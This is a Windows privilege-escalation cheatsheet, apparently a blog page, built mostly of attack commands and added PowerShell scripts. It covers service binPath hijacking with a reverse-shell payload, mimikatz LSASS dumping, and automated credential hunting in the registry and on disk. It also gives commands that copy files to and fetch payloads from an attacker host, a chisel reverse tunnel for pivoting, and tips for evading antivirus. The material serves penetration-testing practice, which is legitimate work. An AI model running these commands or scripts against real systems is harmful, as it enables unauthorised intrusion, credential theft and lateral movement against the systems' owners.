
Privilege escalation is a critical phase of penetration testing and Windows post-exploitation. Once you have a foothold on a machine, escalating to Administrator or SYSTEM unlocks credential material in memory, persistence, and lateral movement across the network. This cheatsheet is a structured, step-by-step guide to enumeration, exploiting misconfigurations, credential dumping, service abuse, registry secrets, and more.
Let's escalate to SYSTEM! 🏴‍☠️

1️⃣ General Enumeration - Who Am I?
Basic User Information
whoami /all
echo %USERNAME%
whoami /groups
Do I Have Anything Fun? (Privileges Check)
whoami /priv
net user <username>
Look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege and SeTakeOwnershipPrivilege. 🚨 A privilege shown as "Disabled" is still held by the token: the process can enable it at any time, so treat it exactly like "Enabled". Service accounts (IIS application pools, MSSQL) usually hold SeImpersonatePrivilege, which is the entry point for the Potato family of token-impersonation exploits. whoami /all prints the user, group and privilege sections in one go.

2️⃣ Where Am I? (System Info)
systeminfo
hostname
Note the OS name, version and build number, the architecture (x64 vs x86, which decides which payloads run), and the installed hotfix list. A host whose newest hotfix is months old is a candidate for public kernel exploits; match on the build number, which is what exploit write-ups are keyed on, not the marketing name.

3️⃣ Anyone Home? (Users & Groups)
net users
net localgroup administrators
Check Logged-In Users
query user
Other users' sessions mean their tokens and credentials are resident in memory on this host; an administrator's session is a target for token theft or LSASS dumping once you are SYSTEM.

4️⃣ What Am I Part Of? (Domain Enumeration)
whoami /groups
net group "Domain Admins" /domain
The /domain queries only work on a domain-joined host that can reach a domain controller. Group membership also tells you which other machines the current account can already reach; sometimes lateral movement is cheaper than local escalation.

5️⃣ What Is This Place? (System & Installed Software Info)
wmic product get name,version,vendor
Look for outdated software with public exploits and for third-party services installed under unusual, possibly user-writable, paths. Caveat: Win32_Product is slow and triggers a consistency check (and sometimes a repair) of every MSI package on the box, which writes MsiInstaller events to the Application log; the Uninstall keys under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall give the same list quietly.

6️⃣ Is It Patched? (OS Version for Kernel Exploits)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Match the exact version and build against kernel exploit write-ups. Kernel exploits are a last resort: a failed one can blue-screen the host and end the engagement, so exhaust the misconfiguration checks below first.

7️⃣ Am I Tied Up? (Restrictions & Policies)
gpresult /z
Look for GPO restrictions (AppLocker rules, software restriction policies, PowerShell constrained language mode, a blocked cmd.exe) that may stop your payloads from running. /z is the verbose form; it needs read access to the applied policy and can take a while on a domain-joined host.

8️⃣ Anything Reachable? (Network Info & Open Ports)
ipconfig /all
netstat -ano
Pay attention to services listening only on 127.0.0.1: they are invisible from the network but reachable from your shell (or through a port forward, see the pivoting section), and are often unauthenticated because "nobody external can reach them". Map the PID column to tasklist to see what owns each port, and note whether RDP (3389) or WinRM (5985) is listening. Extra interfaces in ipconfig mean extra networks to pivot into.

9️⃣ What Does The Inside Look Like? (Processes & Services)
tasklist /v
wmic service get name,displayname,pathname,startmode
In the service list look for an unquoted pathname containing spaces, a pathname under a directory your user can write to, a binary you can overwrite, and startmode Auto (if you cannot restart the service yourself you may still be able to reboot the host). tasklist /v shows the account each process runs as; a privileged process with a writable binary or DLL search path is a target too.

🔟 Leave Me Alone! (Defender & AV Checks)
sc query windefend
wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayName
Identify Defender or third-party AV before dropping tooling: most of the binaries used below (winPEAS, mimikatz) are flagged on sight, so plan for obfuscation or in-memory execution. The SecurityCenter2 namespace exists only on client editions of Windows; on Windows Server the query fails and you have to rely on the service and process lists instead.
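The ten checks above, collapsed into one PowerShell triage pass. This is an added example written for this page, not code from the original cheatsheet or from any tool it mentions. It uses only built-in cmdlets (Get-CimInstance, Get-HotFix, Get-LocalGroupMember, Get-NetTCPConnection), so it runs from a plain PowerShell 5.1 prompt without dropping a binary; the list of "interesting" privileges is an assumption about what is usually abusable, and the service checks are left to the service section further down.

```powershell
# Added example: one-shot triage of steps 1-10 using built-in cmdlets only.
# $InterestingPrivs is an assumption about which privileges are worth abusing.
$InterestingPrivs = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeBackupPrivilege',
    'SeRestorePrivilege', 'SeDebugPrivilege', 'SeTakeOwnershipPrivilege',
    'SeLoadDriverPrivilege', 'SeManageVolumePrivilege'
)

# 1. Token privileges. whoami /priv emits CSV with /fo csv, which is easier
#    to filter than the table form. A "Disabled" state still means "held".
Write-Host "[*] Running as $env:USERDOMAIN\$env:USERNAME"
$privs = whoami /priv /fo csv | ConvertFrom-Csv
$privs | Where-Object { $InterestingPrivs -contains $_.'Privilege Name' } |
    Format-Table 'Privilege Name', State -AutoSize

# 2/6. OS build and patch level. The build number is what exploit write-ups
#      are keyed on; an old newest-hotfix date is the tell for a stale box.
$os = Get-CimInstance Win32_OperatingSystem
Write-Host "[*] $($os.Caption) build $($os.BuildNumber) $($os.OSArchitecture)"
$fixes = @(Get-HotFix | Sort-Object InstalledOn -Descending)
if ($fixes.Count -gt 0) {
    Write-Host "[*] $($fixes.Count) hotfixes, newest $($fixes[0].HotFixID) installed $($fixes[0].InstalledOn)"
} else {
    Write-Host "[!] No hotfixes reported: fresh install, or Get-HotFix is blocked"
}

# 3/4. Local administrators and whether the host is domain-joined.
Write-Host "[*] Local Administrators:"
Get-LocalGroupMember -Group Administrators -ErrorAction SilentlyContinue |
    ForEach-Object { "    $($_.Name) ($($_.ObjectClass))" }
$cs = Get-CimInstance Win32_ComputerSystem
Write-Host "[*] Domain joined: $($cs.PartOfDomain), domain/workgroup: $($cs.Domain)"

# 8. Listeners bound only to loopback: reachable from this shell or through
#    a port forward, invisible from the network, often unauthenticated.
Write-Host "[*] Loopback-only listeners:"
Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
    Where-Object { $_.LocalAddress -in '127.0.0.1', '::1' } |
    Sort-Object LocalPort -Unique |
    Select-Object LocalAddress, LocalPort, OwningProcess,
        @{ n = 'Process'; e = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName } } |
    Format-Table -AutoSize

# 10. AV registration. root/SecurityCenter2 exists only on client SKUs, so on
#     Windows Server the query throws and we fall back to the Defender service.
try {
    Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction Stop |
        Select-Object displayName, productState | Format-Table -AutoSize
} catch {
    Write-Host "[!] SecurityCenter2 unavailable (server edition?); checking the WinDefend service"
    Get-Service -Name WinDefend -ErrorAction SilentlyContinue | Select-Object Name, Status, StartType
}
```

Run it from the foothold shell with powershell -ep bypass if the execution policy blocks scripts. Nothing here touches disk, and every query is one an administrator could plausibly run, which keeps the noise low compared with dropping winPEAS straight away.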

🛠️ Exploitation Techniques
🔹 File Transfer - Upload/Download Files
Using SMB (this copies from the target to an attacker-hosted share; swap the arguments to download)
copy file.exe \\<attacker-ip>\share
Using PowerShell
(New-Object System.Net.WebClient).DownloadFile("http://<attacker-ip>/file.exe", "C:\Users\Public\file.exe")
C:\Users\Public and C:\Windows\Temp are writable by every user. Outbound SMB (445) to an attacker host is frequently blocked at the perimeter, so have an HTTP server ready as the fallback.

🔹 Automated Enumeration - WinPEAS & More
WinPEAS (Windows Privilege Escalation Awesome Scripts)
.\winPEASany.exe
PowerUp - Automated PrivEsc Finder
Import-Module .\PowerUp.ps1
Invoke-AllChecks
Run the automated tools after the manual checks, not instead of them: they are noisy, usually caught by AV, and their output is long enough that real findings get buried. On a default execution policy the import fails; start PowerShell with -ep bypass or dot-source the script (. .\PowerUp.ps1) instead.

🔹 Hacking the Services (Service Misconfiguration)
Checking Access using Accesschk.exe
accesschk.exe -accepteula -uwcqv "Authenticated Users" *
Repeat for "Everyone", "Users" and your own account and groups. A hit showing SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS means you can rewrite the service's binary path; SERVICE_START and SERVICE_STOP decide whether you can trigger it yourself or need a reboot.
Getting ACLs
icacls "C:\Program Files\VulnerableService"
Look for (M), (F) or (W) granted to Users, Authenticated Users, Everyone or BUILTIN\Users. (OI)(CI) on the directory means you can drop a binary there for an unquoted-path or DLL-hijack attack even if the service executable itself is protected.
Exploiting Services - sc.exe
sc config <ServiceName> binPath= "C:\Attack\reverse-shell.exe"
sc start <ServiceName>
The space after binPath= is required syntax. From a PowerShell prompt call sc.exe explicitly, because sc is an alias for Set-Content. The payload runs as the service account (often LocalSystem), but a binary that never reports to the Service Control Manager is killed after about 30 seconds, so have it spawn the shell in a separate process, and restore the original binPath afterwards so the service keeps working.
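The accesschk/icacls/sc sequence above, worked end-to-end in PowerShell. This is an added example for this page, not code from the original cheatsheet, from Sysinternals or from PowerUp: it finds services whose executable, containing directory, or unquoted-path search location is writable by the current token, and prints the sc.exe commands that would hijack each hit. Service names and C:\Attack\reverse-shell.exe are placeholders, and the ACL check is deliberately simple (Allow ACEs only, Deny ACEs ignored), so confirm a hit with accesschk before acting on it.

```powershell
# Added example: find hijackable services from the current token's point of
# view. Simplification: Deny ACEs are ignored, so verify hits with accesschk.

# SIDs of the current user and all of its groups, as strings for comparison.
$me     = [Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

# Rights that let us overwrite or replace a file, or create one in a directory
# (WriteData on a directory is "create files"). FullControl/Modify include these.
$WriteMask = [Security.AccessControl.FileSystemRights]'WriteData, Delete, ChangePermissions, TakeOwnership'

function Test-PathWritable {
    param([string]$Path)
    # Walk up to the nearest existing ancestor: if C:\Program.exe does not
    # exist, what matters is whether we can create it in C:\.
    $target = $Path
    while ($target -and -not (Test-Path -LiteralPath $target)) {
        $target = Split-Path -Parent $target
    }
    if (-not $target) { return $false }
    try { $acl = Get-Acl -LiteralPath $target -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs apply to children, not to this object itself.
        if ($ace.PropagationFlags -band [Security.AccessControl.PropagationFlags]::InheritOnly) { continue }
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($MySids -contains $sid -and ([int]$ace.FileSystemRights -band [int]$WriteMask)) {
            return $true
        }
    }
    return $false
}

function Get-UnquotedPathTarget {
    param([string]$Exe)
    # For C:\Foo Bar\Baz Qux\svc.exe the SCM tries C:\Foo.exe, then
    # C:\Foo Bar\Baz.exe, before the real path. Return the ones we could plant.
    $parts = $Exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
        if (Test-PathWritable (Split-Path -Parent $candidate)) { $candidate }
    }
}

function Get-HijackableService {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }
        # Pull the executable out of the command line, quoted or not.
        if     ($svc.PathName -match '^"([^"]+)"')  { $exe = $Matches[1] }
        elseif ($svc.PathName -match '^(.+?\.exe)') { $exe = $Matches[1] }
        else                                        { $exe = ($svc.PathName -split ' ')[0] }
        $unquoted = ($svc.PathName -notmatch '^"') -and ($exe -match ' ')
        $plant    = if ($unquoted) { @(Get-UnquotedPathTarget $exe) } else { @() }
        $exeW     = Test-PathWritable $exe
        $dirW     = Test-PathWritable (Split-Path -Parent $exe)
        if ($plant.Count -or $exeW -or $dirW) {
            [pscustomobject]@{
                Name = $svc.Name; StartMode = $svc.StartMode; RunsAs = $svc.StartName
                Exe = $exe; ExeWritable = $exeW; DirWritable = $dirW
                UnquotedPlant = ($plant -join '; ')
            }
        }
    }
}

$hits = @(Get-HijackableService)
$hits | Format-Table -AutoSize

# Exploitation for a hit where accesschk also shows SERVICE_CHANGE_CONFIG.
# Use sc.exe, not sc: in PowerShell 'sc' is an alias for Set-Content.
foreach ($h in $hits) {
    Write-Host "sc.exe config $($h.Name) binPath= `"C:\Attack\reverse-shell.exe`"   # needs SERVICE_CHANGE_CONFIG"
    Write-Host "sc.exe stop $($h.Name); sc.exe start $($h.Name)   # or reboot if StartMode=Auto and you lack SERVICE_START"
}
# The payload runs as the RunsAs account (often LocalSystem) but is killed by
# the SCM after ~30 s because it never reports as a service, so have it spawn
# the shell as a child process and restore the original binPath afterwards.
```

A writable executable means overwrite it in place; a writable directory with an unquoted path means plant the .exe at the UnquotedPlant location so the SCM runs yours first. Either way the service must be restarted (or the host rebooted) for the change to take effect.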

🔹 Registry Exploitation (Stored Passwords & Secrets)
Finding Credentials in Registry
reg query HKLM /f password /t REG_SZ /s
Repeat against HKCU. The search over a whole hive is slow, so hit the known locations first: the Winlogon key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, values AutoAdminLogon, DefaultUserName and DefaultPassword, stored in clear text), saved VNC and PuTTY sessions, and application-specific keys under HKLM\SOFTWARE and HKCU\SOFTWARE.

🔹 Credentials or Hashes (Extracting & Using Credentials)
Extracting Credentials from LSASS
mimikatz.exe
sekurlsa::logonpasswords
Reading LSASS needs administrator rights plus SeDebugPrivilege (run privilege::debug first), so this is a post-escalation step: use it to harvest the credentials of other users logged on to the host for lateral movement. Expect Defender to block the stock binary, and with LSA Protection (RunAsPPL) or Credential Guard enabled sekurlsa fails even as SYSTEM.
RunAs - Running Programs as Another User
runas /user:Administrator cmd.exe
This prompts for the password, so it needs a credential you have already found. With /savecred it reuses a credential cached in Credential Manager (list them with cmdkey /list) without you knowing it. The new process is a fresh logon for that user and is subject to UAC token filtering like any other.

🔹 Find Files Fast (Hunting for Sensitive Files)
dir /s /b *password*.*
Run it from C:\ (and every other drive) so the search is tree-wide, and widen the pattern: unattend.xml and sysprep.inf (local admin password, often only base64-encoded), web.config (connection strings), *.rdp, *.kdbx, and the PowerShell history file under %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine. Searching names finds only the obvious files; a content search (findstr /si password on *.xml, *.ini, *.txt and *.config) catches the rest.
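The registry search and the file search above, combined into one PowerShell credential hunt that also reads inside text files. This is an added example written for this page, not code from the original cheatsheet; the search roots, the name pattern and the file extensions are assumptions to tune per target, and keys or paths the current user cannot read are skipped silently.

```powershell
# Added example: hunt for credentials in the registry and on disk.
# $Pattern, the roots and the extension list are assumptions; tune them.
$Pattern = 'passw(or)?d|pwd|secret|credential|connectionstring'

# Known plaintext location first: Winlogon autologon keeps DefaultPassword
# in clear text when AutoAdminLogon is 1.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
Get-ItemProperty -Path $winlogon -ErrorAction SilentlyContinue |
    Select-Object AutoAdminLogon, DefaultDomainName, DefaultUserName, DefaultPassword |
    Format-List

function Find-RegistryCredential {
    param([string[]]$Roots = @('HKLM:\SOFTWARE', 'HKCU:\SOFTWARE'))
    foreach ($root in $Roots) {
        # The registry provider yields RegistryKey objects; keys we cannot
        # open just raise errors that are suppressed. HKLM\SOFTWARE is large,
        # so expect this to take a few minutes.
        Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_
            foreach ($name in $key.GetValueNames()) {
                if ($key.GetValueKind($name) -notin 'String', 'ExpandString', 'MultiString') { continue }
                $data = [string]$key.GetValue($name)
                if ($name -match $Pattern -or $data -match $Pattern) {
                    [pscustomobject]@{ Key = $key.Name; Value = $name; Data = $data }
                }
            }
        }
    }
}

function Find-CredentialFile {
    param([string[]]$Roots = @('C:\Users', 'C:\inetpub', 'C:\ProgramData', 'C:\Windows\Panther'))
    $files = Get-ChildItem -Path $Roots -Recurse -File -Force -ErrorAction SilentlyContinue

    # By name: password-ish names plus the classic Windows and IIS artefacts.
    $files | Where-Object {
        $_.Name -match $Pattern -or
        $_.Name -match '^(unattend|autounattend)\.xml$|^sysprep\.(xml|inf)$|^web\.config$|\.(kdbx|rdp|ppk)$|ConsoleHost_history\.txt$'
    } | Select-Object FullName, Length, LastWriteTime

    # By content: text-like files only, first matching line per file, and
    # only where the keyword is followed by = or : so prose does not match.
    $files | Where-Object { $_.Extension -in '.txt', '.ini', '.xml', '.config', '.ps1', '.bat', '.cmd', '.json', '.yml', '.yaml' } |
        Select-String -Pattern "($Pattern)\s*[=:]" -List -ErrorAction SilentlyContinue |
        Select-Object Path, LineNumber, @{ n = 'Match'; e = { $_.Line.Trim() } }
}

Find-RegistryCredential | Format-Table -AutoSize
Find-CredentialFile     | Format-Table -AutoSize
```

Both functions return objects rather than printing, so you can pipe them to Export-Csv or filter further (for example, drop matches under C:\Windows\WinSxS, which are almost always noise). Anything found here is also input to the runas step above and to the port-forwarding section below.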

🔹 Port Forwarding (Pivoting & Lateral Movement)
Using Chisel
chisel client <attacker-ip>:8080 R:9999:127.0.0.1:3389
This is a reverse forward: the chisel server on the attacker side must be started with --reverse listening on 8080, after which 127.0.0.1:9999 on the attacker box reaches the target's RDP. The same shape tunnels any loopback-only service you found with netstat (SMB on 445, WinRM on 5985, a local database) through the target's firewall. Pick a server port the target can already reach outbound, such as 80 or 443.

🔥 Final Thoughts
Mastering Windows privilege escalation takes practice. Work the enumeration in order and record every finding; then take the cheap wins (misconfigured services, stored credentials, abusable privileges) before reaching for kernel exploits, and use the network pivoting to turn one box into the next.
"Try Harder" and Hack Like a Pro!